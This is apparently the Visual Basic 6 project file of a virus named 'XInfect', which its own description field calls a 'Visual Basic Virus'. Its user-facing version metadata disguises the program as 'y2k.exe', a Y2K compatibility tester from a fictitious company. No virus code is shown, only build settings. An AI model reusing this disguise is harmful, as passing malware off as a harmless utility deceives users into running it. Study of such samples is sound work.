Type=Exe
Form=y2k.frm
IconForm="y2k"
Startup="y2k"
HelpFile=""
NoControlUpgrade=1
Title="y2k"
ExeName32="y2k.exe"
Path32="..\..\..\..\..\.."
Command32=""
Name="XInfect"
HelpContextID="0"
Description="XInfection - Visual Basic Virus"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="localhost2000"
VersionFileDescription="y2k will test your system's y2k compatibility"
VersionLegalCopyright="(c) by y2k testing corporation"
CompilationType=0
OptimizationType=1
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=-1
BoundsCheck=-1
OverflowCheck=-1
FlPointCheck=-1
FDIVCheck=-1
UnroundedFP=-1
StartMode=0
Unattended=0
ThreadPerObject=0
MaxNumberOfThreads=1
